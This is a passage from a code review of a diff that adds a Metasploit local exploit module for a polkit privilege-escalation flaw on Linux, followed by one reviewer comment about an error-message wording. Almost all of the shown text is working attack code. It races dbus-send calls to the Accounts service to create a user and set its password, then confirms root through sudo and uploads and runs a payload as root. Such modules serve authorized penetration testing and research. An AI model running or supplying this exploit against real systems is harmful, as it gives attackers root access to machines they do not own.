modules/exploits/linux/local/polkit_priv_esc.rb

```diff
@@ -0,0 +1,254 @@
+          string:#{datastore['USERNAME']}#{' '}
+          string:\"#{datastore['USERNAME']}\"#{' '}
+          int32:1 &
+        sleep #{datastore['CMDDELAY']}s;
+        kill $!;
+        if id #{datastore['USERNAME']}; then#{' '}
+          echo \"success\";#{' '}
+          break;
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def exploit_set_password(uid, hashed_password)
+    cmd_exec(<<~SCRIPT
+      for i in {1..#{datastore['ITERATIONS']}; do
+        dbus-send#{' '}
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply#{' '}
+          /org/freedesktop/Accounts/User#{uid}#{'  '}
+          org.freedesktop.Accounts.User.SetPassword#{' '}
+          string:'#{hashed_password}'#{' '}
+          string: &#{' '}
+        sleep #{datastore['CMDDELAY']}s;
+        kill $!;#{' '}
+        echo #{datastore['PASSWORD']}#{' '}
+        | su - #{datastore['USERNAME']}#{' '}
+        -c \"echo #{datastore['PASSWORD']} | sudo -S id\"#{' '}
+        | grep \"uid=0(root)\";#{' '}
+        if [ $? -eq 0 ]; then#{' '}
+          echo \"success\";
+          break;#{' '}
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def upload_payload
+    fname = "#{datastore['WRITEABLEDIR']}/#{Rex::Text.rand_text_alpha(5)}"
+    upload_and_chmodx(fname, generate_payload_exe)
+    return nil unless file_exist?(fname)
+
+    fname
+  end
+
+  def execute_payload(fname)
+    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
+  end
+
+  # TODO: - use dbus to delete user method
+  def remove_user
+    print_status('Removing the user added: ')
+  end
+
+  def exploit
+    print_status("Attempting to create user #{datastore['USERNAME']}")
+    if exploit_set_username
+      uid = cmd_exec("id -u #{datastore['USERNAME']}")
+      print_good("User #{datastore['USERNAME']} created with UID #{uid}")
+      print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
+      if exploit_set_password(uid, create_unix_crypt_hash)
+        print_good('Obtained code execution has root!')
+        fname = upload_payload
+        execute_payload(fname)
+        # TODO: remove_user
+        remove_user
+      else
+        fail_with(Failure::BadConfig, "Attempted setting the password #{datastore['Iterations']} times, did not work.")
+      end
+    else
+      fail_with(Failure::BadConfig, "The user #{datastore['USERNAME']} was unable to be created. This could be due to race condition that the vulnerability.")
```

Comment:
Might need a small word tweak, but may also be removed in the future - so who knows! 🎉 
> This could be due to race condition that the vulnerability